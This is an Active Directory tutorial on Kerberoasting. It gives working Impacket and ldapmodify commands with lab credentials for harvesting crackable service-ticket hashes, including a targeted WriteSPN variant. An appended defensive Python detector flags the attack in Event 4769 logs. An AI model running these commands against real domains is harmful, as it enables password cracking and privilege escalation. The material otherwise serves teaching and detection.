Kerberoasting

Overview

The attacker starts from a valid domain user account, i.e. a known username and password on the domain.

A typical Kerberos workflow is:

  • Once a user logs into a domain-joined system, they get a TGT (ticket-granting ticket).
  • Then, they'll use that TGT to request a TGS (ticket-granting service) ticket any time they need to authenticate to a service.
  • The TGS is then passed to an application server on the network for authentication.

Any domain user can request a TGS. This is because:

  • The domain controller does not determine if a user can access a network service.
  • It simply provides a ticket to forward to a service and expects the service to determine permissions.

The important part here is:

  • A TGS is encrypted with the service principal's password hash, so the ticket carries material that can be attacked offline.
  • Service principals are service accounts that run daemons on a server.

Kerberoasting works by requesting a TGS like any normal client would, but:

  • The attacker does not forward the TGS to the server.
  • Rather, the attacker collects the Kerberos TGS hash and attempts to crack it to reveal a service principal's cleartext password.


What's the Flaw?

In many domains, service principals -- or user accounts configured with a ServicePrincipalName (SPN) -- are incorrectly configured with excessive permissions or ACLs. If an attacker is able to crack a service principal's password hash and reveal the service principal's password, that password can be reused to own other hosts.

This could mean elevation of privilege by way of the service account or abusing DACLs to pivot to another resource and enumerate further.


The Attack

Existing Service Principals

This attack will send ticket-granting service ticket requests to the domain controller and expose the Kerberos hashes of domain service accounts.

The Kali Linux developers have created a series of wrappers around the Impacket scripts. In this case, you can invoke GetUserSPNs.py simply by running impacket-GetUserSPNs. The two commands below are equivalent:

GetUserSPNs.py 'domain.tld/username:password' -dc-ip <domain-controller-ip> -request
impacket-GetUserSPNs 'domain.tld/username:password' -dc-ip <domain-controller-ip> -request

impacket-GetUserSPNs wrapper on Kali Linux

Targeted Kerberoasting

If you've compromised a user account and find that this user has WriteSPN on another user object, you can:

  1. Set a ServicePrincipalName on the user object
  2. Request a TGS for this SPN
  3. Attempt to crack the hash in the TGS and reveal the target account's password

Abuse WriteSPN from Linux

ldapmodify -x -D 'john.doe@ad.lab' -w 'P@$$word123!' -H ldap://dc01.ad.lab << EOF
dn: CN=jane.doe,OU=Users,DC=ad,DC=lab
changetype: modify
add: servicePrincipalName
servicePrincipalName: pwn/pwn
EOF

Use the john.doe@ad.lab credential to set an SPN of pwn/pwn on jane.doe@ad.lab

impacket-GetUserSPNs 'ad.lab/john.doe:P@$$word123!' -dc-ip 10.80.80.2 -request-user 'jane.doe'

Output the TGS for jane.doe in a crackable format
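Added here as the defender's counterpart to both request patterns above (bulk and targeted), not code from the original page: a detection heuristic over Windows Security Event 4769 (A Kerberos service ticket was requested) records, which every TGS request in this write-up produces on the domain controller. Field names are the 4769 event's own; the sample records, the RC4 focus and the thresholds are constructed assumptions to tune for your environment.

```python
"""Flag Kerberoasting-style TGS bursts in Windows Security Event 4769 records.
Constructed example, not from the original page. Input: 4769 events parsed into dicts
keyed by the event's own field names (TargetUserName = requester, ServiceName = service
account, TicketEncryptionType, TimeCreated as ISO-8601)."""
from collections import defaultdict
from datetime import datetime, timedelta
RC4_HMAC = "0x17"  # downgraded etype typical of Kerberoasting; AES service tickets are 0x11 / 0x12

def _is_candidate(ev):
    svc = ev["ServiceName"]
    return (
        ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
        and svc.lower() != "krbtgt"  # krbtgt requests are TGT traffic, not a service account
        and not svc.endswith("$")    # machine accounts have random 120-character passwords
    )

def detect_kerberoasting(events, min_services=3, window=timedelta(minutes=5)):
    """Return {requester: sorted service accounts} for requesters that hit the threshold:
    RC4 service tickets for >= min_services distinct accounts inside one time window."""
    by_user = defaultdict(list)
    for ev in events:
        if _is_candidate(ev):
            by_user[ev["TargetUserName"]].append(
                (datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):  # sliding window over time-sorted requests
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            services = {svc for _, svc in reqs[start:end + 1]}
            if len(services) >= min_services:
                alerts[user] = sorted(services)
                break
    return alerts

# Constructed sample records (not real telemetry); the 0x12 and machine-account
# requests are benign noise the heuristic must ignore.
SAMPLE_4769 = [
    {"TimeCreated": "2024-01-10T09:00:01", "TargetUserName": "john.doe@AD.LAB", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12"},
    {"TimeCreated": "2024-01-10T09:00:02", "TargetUserName": "john.doe@AD.LAB", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2024-01-10T09:00:02", "TargetUserName": "john.doe@AD.LAB", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2024-01-10T09:00:03", "TargetUserName": "john.doe@AD.LAB", "ServiceName": "jane.doe", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2024-01-10T09:00:03", "TargetUserName": "john.doe@AD.LAB", "ServiceName": "WS01$", "TicketEncryptionType": "0x17"},
    {"TimeCreated": "2024-01-10T09:30:00", "TargetUserName": "alice@AD.LAB", "ServiceName": "svc_sql", "TicketEncryptionType": "0x12"},
]
if __name__ == "__main__":
    print(detect_kerberoasting(SAMPLE_4769))  # {'john.doe@AD.LAB': ['jane.doe', 'svc_sql', 'svc_web']}
```

A single user pulling RC4 tickets for several non-machine service accounts in a burst is the signature this page's GetUserSPNs runs leave behind; pairing it with auditing of servicePrincipalName changes on user objects covers the targeted variant as well.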